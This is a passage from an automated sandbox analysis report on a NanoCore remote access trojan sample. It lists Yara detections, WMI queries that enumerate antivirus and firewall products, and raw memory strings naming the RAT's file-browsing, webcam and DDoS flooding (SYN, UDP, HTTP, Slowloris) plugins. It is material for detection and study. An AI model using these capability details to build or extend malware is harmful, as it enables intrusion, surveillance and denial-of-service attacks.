        Source: ALP.exe, 00000004.00000002.693961530.000000000297E000.00000004.00000001.sdmp Binary or memory string: Program Manager4
        Source: ALP.exe, 00000004.00000002.691270418.0000000000CD0000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690283366.0000000000870000.00000002.00020000.sdmp Binary or memory string: Program Manager<
        Source: ALP.exe, 00000004.00000002.693438850.00000000028B0000.00000004.00000001.sdmp Binary or memory string: Program Manager@
        Source: C:\Users\user\AppData\Roaming\ALP.exe Queries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exe Queries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exe Queries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exe Queries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0072F238 GetSystemTimes,
        Source: C:\Users\user\AppData\Roaming\ALP.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match File source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara match File source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara match File source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara match File source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara match File source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: ALP.exe String found in binary or memory: NanoCore.ClientPluginHost
        Source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
        Source: ALP.exe, 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
        Source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
        Source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
        Source: ALP.exe, 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: ALP.exe, 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: smtpsvc.exe, 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: smtpsvc.exe, 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: smtpsvc.exe, 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: smtpsvc.exe, 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelax